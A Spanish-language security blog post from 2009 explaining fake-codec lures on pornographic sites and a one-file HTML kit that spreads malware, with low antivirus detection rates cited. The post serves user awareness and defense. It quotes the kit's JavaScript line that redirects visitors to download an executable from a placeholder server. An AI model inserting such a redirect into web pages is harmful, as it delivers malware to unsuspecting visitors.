Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

martes, 27 de enero de 2009

Técnicas de engaño que no pasan de moda

¿Somos hijos del rigor?

Una de las cuestiones que a diario motiva alguna reflexión es por qué los usuarios siguen cayendo en trampas ya por demás conocidas.

Técnicas de Ingeniería Social como la doble extensión en los archivos, espacios entre el nombre del archivo y la extensión y, desde que se comenzó a utilizar Internet como plataforma de ataque, técnicas como los falsos códecs son una pequeña muestra de algunas de ellas.


Los sitios web que alojan material pornográfico suelen ser los más visitados en Internet y, también, los más utilizados por los diseminadores de malware para propagar amenazas. Y por más que nos preguntemos cómo puede ser posible que todavía los usuarios sigan infectando sus equipos a través de estas estrategias de engaño, la respuesta parecería recaer en algo tan simple de justificar como "un alto porcentaje de demanda" por el consumo de dicho material, como uno de los más buscados.


Los creadores de malware saben muy bien que la cosa es así, y que la persona que visita un sitio pornográfico, quiere ver pornografía, sin importar el formato con el cual se presente el recurso (video y/o imagen); en consecuencia, si a ese usuario se le ofrece la descarga de uno, e incluso varios, falsos códecs para poder visualizar el supuesto video, lo más probable es que, en la mayoría de los casos, el usuario los descargue.


Entonces, verán en pantalla algo similar a lo mostrado en la captura, que al pasar unos segundos mostrará una ventana pop-ups parecida a la siguiente:

El usuario, pensando que se trata de un códec necesario para la visualización del video, lo instala. En realidad, lo que instala es un malware, hasta el día de la fecha detectado sólo por algunas compañías antivirus.

Por otro lado, existe un aplicativo contituido tan sólo por un archivo HTML que es utilizado para propagar masivamente y a través de cualquier medio este tipo de acciones.

El aplicativo no permite crear ni modificar códigos maliciosos sino que permite la diseminación de los mismos a través del clásico modo mencionado.
El único requerimiento es alojar en un servidor (o en cualquier zombie PC) el archivo HTML y especificar en su código la dirección de descarga del malware en la siguiente porción de código.

window.setTimeout("location.href='http://servidor.com/archivo.exe'", 1000);

Como componentes adicionales, el kit propone redirigir también hacia la visualización de un video real. Esto es parte de la estrategia de Ingeniería Social y busca despejar alguna sospecha por parte del usuario.

Ya no hablamos sólo de técnicas como Drive-by-Download, exploit, scripting. ofuscación de código, entre tantos otros, sino que hablamos de cautela y sentido común.

Es decir, no alcanza con sólo confiar la seguridad ante los peligros que representan los códigos maliciosos a soluciones antivirus ya que, en este caso y según el reporte de VT, actualmente los AV nos ofrecen sólo un 35.09% de protección donde sólo 14 de 39 detectan la amenaza, el otro 64.91% dependerá netamente de nuestra habilidad y sentido común para detectar una potencial actividad maliciosa.


# pistus

Ver más